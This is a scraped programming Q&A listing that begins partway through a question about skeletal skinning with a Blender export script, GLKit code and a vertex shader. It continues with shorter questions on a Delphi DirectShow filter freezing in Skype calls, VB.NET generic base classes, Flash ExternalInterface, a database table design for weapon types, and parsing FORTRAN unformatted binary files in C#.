this and it just screws things up in a different way cause there's something else wrong. Finally, If we wanted to skin a vertex to a joint j1 which in turn is a child of a joint j0, Bj1 would be Bj0 * Bj1 and Cj1 would be Cj0 * Cj1. But Since skinning is defined as v' = Cj * Bj^-1 * v , Bj1^-1 would be the reverse concatenation of the inverses making up the original product. That is, v' = Cj0 * Cj1 * Bj1^-1 * Bj0^-1 * v Now on to the implementation (Blender side): Assume the following mesh made up of 1 cube, whose vertices are bound to a single joint in a single-joint skeleton: Assume also there's a 60-frame, 3-keyframe animation at 60 fps. The animation essentially is: keyframe 0: the joint is in bind / rest pose (the way you see it in the image). 
keyframe 30: the joint translates up (+z in blender) some amount and at the same time rotates pi/4 rad clockwise. keyframe 59: the joint goes back to the same configuration it was in keyframe 0. My first source of confusion on the blender side is its coordinate system (as opposed to OpenGL's default) and the different matrices accessible through the python api. Right now, this is what my export script does about translating blender's coordinate system to OpenGL's standard system: # World transform: Blender -> OpenGL worldTransform = Matrix().Identity(4) worldTransform *= Matrix.Scale(-1, 4, (0,0,1)) worldTransform *= Matrix.Rotation(radians(90), 4, "X") # Mesh (local) transform matrix file.write('Mesh Transform:\n') localTransform = mesh.matrix_local.copy() localTransform = worldTransform * localTransform for col in localTransform.col: file.write('{:9f} {:9f} {:9f} {:9f}\n'.format(col[0], col[1], col[2], col[3])) file.write('\n') So if you will, my "world" matrix is basically the act of changing blenders coordinate system to the default GL one with +y up, +x right and -z into the viewing volume. Then I also premultiply (in the sense that it's done by the time we reach the engine, not in the sense of post or pre in terms of matrix multiplication order) the mesh matrix M so that I don't need to multiply it again once per draw call in the engine. About the possible matrices to extract from Blender joints (bones in Blender parlance), I'm doing the following: For joint bind poses: def DFSJointTraversal(file, skeleton, jointList): for joint in jointList: bindPoseJoint = skeleton.data.bones[joint.name] bindPoseTransform = bindPoseJoint.matrix_local.inverted() file.write('Joint ' + joint.name + ' Transform {\n') translationV = bindPoseTransform.to_translation() rotationQ = bindPoseTransform.to_3x3().to_quaternion() scaleV = bindPoseTransform.to_scale() file.write('T {:9f} {:9f} {:9f}\n'.format(translationV[0], translationV[1], translationV[2])) file.write('Q {:9f} {:9f} {:9f} {:9f}\n'.format(rotationQ[1], rotationQ[2], rotationQ[3], rotationQ[0])) file.write('S {:9f} {:9f} {:9f}\n'.format(scaleV[0], scaleV[1], scaleV[2])) DFSJointTraversal(file, skeleton, joint.children) file.write('}\n') Note that I'm actually grabbing the inverse of what I think is the bind pose transform Bj. This is so I don't need to invert it in the engine. Also note I went for matrix_local, assuming this is Bj. The other option is plain "matrix", which as far as I can tell is the same only that not homogeneous. For joint current / keyframe poses: for kfIndex in keyframes: bpy.context.scene.frame_set(kfIndex) file.write('keyframe: {:d}\n'.format(int(kfIndex))) for i in range(0, len(skeleton.data.bones)): file.write('joint: {:d}\n'.format(i)) currentPoseJoint = skeleton.pose.bones[i] currentPoseTransform = currentPoseJoint.matrix translationV = currentPoseTransform.to_translation() rotationQ = currentPoseTransform.to_3x3().to_quaternion() scaleV = currentPoseTransform.to_scale() file.write('T {:9f} {:9f} {:9f}\n'.format(translationV[0], translationV[1], translationV[2])) file.write('Q {:9f} {:9f} {:9f} {:9f}\n'.format(rotationQ[1], rotationQ[2], rotationQ[3], rotationQ[0])) file.write('S {:9f} {:9f} {:9f}\n'.format(scaleV[0], scaleV[1], scaleV[2])) file.write('\n') Note that here I go for skeleton.pose.bones instead of data.bones and that I have a choice of 3 matrices: matrix, matrix_basis and matrix_channel. 
From the descriptions in the python API docs I'm not super clear which one I should choose, though I think it's the plain matrix. Also note I do not invert the matrix in this case. The implementation (Engine / OpenGL side): My animation subsystem does the following on each update (I'm omitting parts of the update loop where it's figured out which objects need update and time is hardcoded here for simplicity): static double time = 0; time = fmod((time + elapsedTime),1.); uint16_t LERPKeyframeNumber = 60 * time; uint16_t lkeyframeNumber = 0; uint16_t lkeyframeIndex = 0; uint16_t rkeyframeNumber = 0; uint16_t rkeyframeIndex = 0; for (int i = 0; i < aClip.keyframesCount; i++) { uint16_t keyframeNumber = aClip.keyframes[i].number; if (keyframeNumber <= LERPKeyframeNumber) { lkeyframeIndex = i; lkeyframeNumber = keyframeNumber; } else { rkeyframeIndex = i; rkeyframeNumber = keyframeNumber; break; } } double lTime = lkeyframeNumber / 60.; double rTime = rkeyframeNumber / 60.; double blendFactor = (time - lTime) / (rTime - lTime); GLKMatrix4 bindPosePalette[aSkeleton.jointsCount]; GLKMatrix4 currentPosePalette[aSkeleton.jointsCount]; for (int i = 0; i < aSkeleton.jointsCount; i++) { F3DETQSType& lPose = aClip.keyframes[lkeyframeIndex].skeletonPose.joints[i]; F3DETQSType& rPose = aClip.keyframes[rkeyframeIndex].skeletonPose.joints[i]; GLKVector3 LERPTranslation = GLKVector3Lerp(lPose.t, rPose.t, blendFactor); GLKQuaternion SLERPRotation = GLKQuaternionSlerp(lPose.q, rPose.q, blendFactor); GLKVector3 LERPScaling = GLKVector3Lerp(lPose.s, rPose.s, blendFactor); GLKMatrix4 currentTransform = GLKMatrix4MakeWithQuaternion(SLERPRotation); currentTransform = GLKMatrix4TranslateWithVector3(currentTransform, LERPTranslation); currentTransform = GLKMatrix4ScaleWithVector3(currentTransform, LERPScaling); GLKMatrix4 inverseBindTransform = GLKMatrix4MakeWithQuaternion(aSkeleton.joints[i].inverseBindTransform.q); inverseBindTransform = GLKMatrix4TranslateWithVector3(inverseBindTransform, aSkeleton.joints[i].inverseBindTransform.t); inverseBindTransform = GLKMatrix4ScaleWithVector3(inverseBindTransform, aSkeleton.joints[i].inverseBindTransform.s); if (aSkeleton.joints[i].parentIndex == -1) { bindPosePalette[i] = inverseBindTransform; currentPosePalette[i] = currentTransform; } else { bindPosePalette[i] = GLKMatrix4Multiply(inverseBindTransform, bindPosePalette[aSkeleton.joints[i].parentIndex]); currentPosePalette[i] = GLKMatrix4Multiply(currentPosePalette[aSkeleton.joints[i].parentIndex], currentTransform); } aSkeleton.skinningPalette[i] = GLKMatrix4Multiply(currentPosePalette[i], bindPosePalette[i]); } Finally, this is my vertex shader: #version 100 uniform mat4 modelMatrix; uniform mat3 normalMatrix; uniform mat4 projectionMatrix; uniform mat4 skinningPalette[6]; uniform lowp float skinningEnabled; attribute vec4 position; attribute vec3 normal; attribute vec2 tCoordinates; attribute vec4 jointsWeights; attribute vec4 jointsIndices; varying highp vec2 tCoordinatesVarying; varying highp float lIntensity; void main() { tCoordinatesVarying = tCoordinates; vec4 skinnedVertexPosition = vec4(0.); for (int i = 0; i < 4; i++) { skinnedVertexPosition += jointsWeights[i] * skinningPalette[int(jointsIndices[i])] * position; } vec4 skinnedNormal = vec4(0.); for (int i = 0; i < 4; i++) { skinnedNormal += jointsWeights[i] * skinningPalette[int(jointsIndices[i])] * vec4(normal, 0.); } vec4 finalPosition = mix(position, skinnedVertexPosition, skinningEnabled); vec4 finalNormal = mix(vec4(normal, 0.), skinnedNormal, 
skinningEnabled); vec3 eyeNormal = normalize(normalMatrix * finalNormal.xyz); vec3 lightPosition = vec3(0., 0., 2.); lIntensity = max(0.0, dot(eyeNormal, normalize(lightPosition))); gl_Position = projectionMatrix * modelMatrix * finalPosition; } The result is that the animation displays wrong in terms of orientation. That is, instead of bobbing up and down it bobs in and out (along what I think is the Z axis according to my transform in the export clip). And the rotation angle is counterclockwise instead of clockwise. If I try with a more than one joint, then it's almost as if the second joint rotates in it's own different coordinate space and does not follow 100% its parent's transform. Which I assume it should from my animation subsystem which I assume in turn follows the theory I explained for the case of more than one joint. Any thoughts?

    Read the article

  • DirectShow Filter I wrote dies after 10-24 seconds in Skype video call

    - by Robert Oschler
    I've written a DirectShow push filter for use with Skype using Delphi Pro 6 and the DSPACK DirectShow library. In preview mode, when you test a video input device in the Skype client Video Settings window, my filter works flawlessly. I can leave it up and running for many minutes without an error. However, when I start a video call, after 10 to 24 seconds (never longer) the video feed freezes. The call continues fine with the call duration counter clicking away the seconds, but the video feed is dead, stuck on whatever frame was showing when the freeze happened (although after a long while it turns black, which I believe means Skype has given up on the filter). I tried attaching to the process from my debugger with a breakpoint literally set on every method call, and none of them are hit once the freeze takes place. It's as if the thread that makes the DirectShow FillBuffer() call to my filter on behalf of Skype is dead or has been shut down. I can't trace my filter in the debugger because I get weird int 1 and int 3 hard debugger interrupts while a Skype video call is in progress. This behavior happens even with my standard web cam input device selected and my DirectShow filter completely unregistered as an ActiveX server. I suspect it might be some "anti-debugging" code, since it doesn't happen in video input preview mode. Either way, that is why I had to attach to the process after the fact to see if my FillBuffer() was still being called, and instead discovered that it appears to be dead. Note, my plain vanilla USB web cam's DirectShow filter does not exhibit the freezing behavior and works fine for many minutes. There's something about my filter that Skype doesn't like. I've tried Sleep() statements of varying intervals, no Sleep statements, and doing virtually nothing in the FillBuffer() call. Nothing helps. If anyone has any ideas on what might be the culprit here, I'd like to know. Thanks, Robert

    Read the article

  • VB.NET, templates, reflection, inheritance, feeling adrift

    - by brovar
    I've just made myself up a problem and am now wondering how to solve it. To begin with, I'm using some third-party components, including some calendar controls like schedule and timeline. They're used in the project classes more or less like that: Friend Class TimeBasedDataView 'some members End Class Friend Class ScheduleDataView Inherits TimeBasedDataView Public Schedule As Controls.Schedule.Schedule 'and others End Class Friend Class TimeLineDataView Inherits TimeBasedDataView Public TimeLine As Controls.TimeLine.TimeLine 'and others End Class (Hmm, code coloring fail, never mind...) Now, to allow managing the look of data being presented there are some mechanisms including so called Style Managers. A lot of code in them repeats, varying almost only with the control it maintains: Friend Class TimeLineStyleManager Private m_TimeLine As TimeLineDataView Private Sub Whatever() m_TimeLine.TimeLine.SomeProperty = SomeValue End Sub End Class Friend Class ScheduleStyleManager Private m_Schedule As ScheduleDataView Private Sub Whatever() m_Schedule.Schedule.SomeProperty = SomeValue End Sub End Class I was wondering if I could create some base class for those managers, like Friend Class TimeBasedCtrlStyleManagerBase(Of T As TimeBasedDataView) Private m_Control As T 'and others End Class which would unify these two, but I've got lost when it came to maintaining two components that have nothing in common (except their properties' names, etc.). Type reflection maybe? I'll be grateful for any advice ;)

    Read the article

  • ExternalInterface

    - by Jesse
    Hey, so I'm having a bunch of trouble getting ExternalInterface to work, which is odd, because I use it somewhat often. I'm hoping it's something I just missed because I've been looking at it too long. The flash_ready function is correctly returning the objectID, and as far as I can tell, everything else is in order. Unfortunately, when I run it, I get an error (varying by browser) telling me that basically document.getElementById(<movename>).test() is not a valid method. Here's the code: javascript: function flash_ready(i){ document.getElementById(i).test('success!'); } Embed Html (Generated): <script type="text/javascript"> swfobject.embedSWF("/chainmaille/includes/media/flash/upload_image.swf", "/chainmaille/includes/media/flash/upload_image", "500", "50", "9.0.0","expressInstall.swf", {}, {allowScriptAccess:'always', wmode:'transparent'},{id:'uploader_flash',name:'uploader_flash'}); </script> <object type="application/x-shockwave-flash" id="uploader_flash" name="uploader_flash" data="/chainmaille/includes/media/flash/upload_image.swf" width="500" height="50"><param name="allowScriptAccess" value="always"><param name="wmode" value="transparent"></object> AS3 : package com.jesseditson.uploader { import flash.display.MovieClip; import flash.external.ExternalInterface; import flash.system.Security; public class UI extends MovieClip { // Initialization: public function UI() { Security.allowDomain('*'); ExternalInterface.addCallback("test", test); var jscommand:String = "flash_ready('"+ExternalInterface.objectID+"');"; var url:URLRequest = new URLRequest("javascript:" + jscommand + " void(0);"); navigateToURL(url, "_self"); } public function test(t){ trace(t); } } } Swfobject is being included via google code, and the flash embeds just fine, so that's not the problem. I've got a very similar setup working on another server, but can't seem to get it working on this one. It's a Hostgator shared server. Could it be the server's fault? Anybody see any obvious syntax problems? Thanks in advance!

    Read the article

  • How to 'scale' these three tables?

    - by iddqd
    I have the following tables: Players id playerName Weapons id type otherData Weapons2Player id playersID_reference weaponsID_reference That was nice and simple. Now I need to SELECT items from the Weapons table according to some of their characteristics, which I previously just packed into the otherData column (since it was only needed on the client side). The problem is that the types have varying characteristics - but also a lot of similar data. So I'm trying to decide between the following possibilities, all of which have their pros and cons. Solution A Kill the Weapons table and create a new table for each weapon type: Weapons_Swords id bladeType damage otherData Weapons_Guns id accuracy damage ammoType otherData But how will I link these to the Players? Create Weapons_Swords2Players, Weapons_Guns2Players for each weapon type? (That will result in a lot more JOINs when loading the player with all his weapons... and it's also more complicated to insert a new player.) Or add another column to Weapons2Players called WeaponsTypeTable, then do sub-selects against the correct Weapons sub-table (seems easier, but not really right; a slightly easier insert, I guess). Solution B Keep the Weapons table and add all the fields I need to it. The problem is that there will then be NULL fields, since not all weapon types use all fields (can't be right): Weapons id type accuracy damage ammoType bladeType otherData This seems to be pretty basic stuff, but I just can't decide what's best. Or is there a correct Solution C? Many thanks.
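
    For comparison, this is roughly what Solution A looks like expressed as class-table inheritance, which keeps a single Weapons2Player link table pointing at the base id; the sketch uses Python/SQLAlchemy purely as illustration (the question mentions neither, and SQLAlchemy 1.4+ is assumed):

        from sqlalchemy import Column, ForeignKey, Integer, String
        from sqlalchemy.orm import declarative_base

        Base = declarative_base()

        class Weapon(Base):                      # shared columns live here once
            __tablename__ = "weapons"
            id = Column(Integer, primary_key=True)
            type = Column(String(20))
            damage = Column(Integer)
            __mapper_args__ = {"polymorphic_on": type, "polymorphic_identity": "weapon"}

        class Sword(Weapon):                     # per-type columns live in sub-tables
            __tablename__ = "swords"
            id = Column(Integer, ForeignKey("weapons.id"), primary_key=True)
            blade_type = Column(String(20))
            __mapper_args__ = {"polymorphic_identity": "sword"}

        class Gun(Weapon):
            __tablename__ = "guns"
            id = Column(Integer, ForeignKey("weapons.id"), primary_key=True)
            accuracy = Column(Integer)
            ammo_type = Column(String(20))
            __mapper_args__ = {"polymorphic_identity": "gun"}

    Weapons2Player keeps referencing weapons.id regardless of type, and the per-type attributes stay in their own tables without NULL padding.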

    Read the article

  • C# - parse content away from structure in a binary file

    - by Jeff Godfrey
    Using C#, I need to read a packed binary file created using FORTRAN. The file is stored in an "Unformatted Sequential" format as described here (about half-way down the page in the "Unformatted Sequential Files" section): http://www.tacc.utexas.edu/services/userguides/intel8/fc/f_ug1/pggfmsp.htm As you can see from the URL, the file is organized into "chunks" of 130 bytes or less and includes 2 length bytes (inserted by the FORTRAN compiler) surrounding each chunk. So, I need to find an efficient way to parse the actual file payload away from the compiler-inserted formatting. Once I've extracted the actual payload from the file, I'll then need to parse it up into its varying data types. That'll be the next exercise. My first thoughts are to slurp up the entire file into a byte array using File.ReadAllBytes. Then, just iterate through the bytes, skipping the formatting and transferring the actual data to a second byte array. In the end, that second byte array should contain the actual file contents minus all the formatting, which I'd then need to go back through to get what I need. As I'm fairly new to C#, I thought there might be a better, more accepted way of tackling this. Also, in case it's helpful, these files could be fairly large (say 30MB), though most will be much smaller...
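
    A concept sketch in Python rather than C# (the loop translates directly): walk the file chunk by chunk, trust the leading length byte, skip the matching trailing one, and keep only the payload. The exact meaning of the length bytes and any continuation flags is an assumption taken from the question's own description, not verified against the Intel document:

        def strip_record_markers(path):
            payload = bytearray()
            with open(path, "rb") as fh:
                while True:
                    head = fh.read(1)
                    if not head:
                        break                 # clean end of file
                    length = head[0]          # assumed: leading byte = payload size
                    payload += fh.read(length)
                    fh.read(1)                # assumed: trailing copy of the length byte
            return bytes(payload)

    Reading the whole file with File.ReadAllBytes and walking it with an index is the same loop on the C# side; carving the concatenated payload into its varying data types is then a separate pass (struct.unpack here, BitConverter there).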

    Read the article
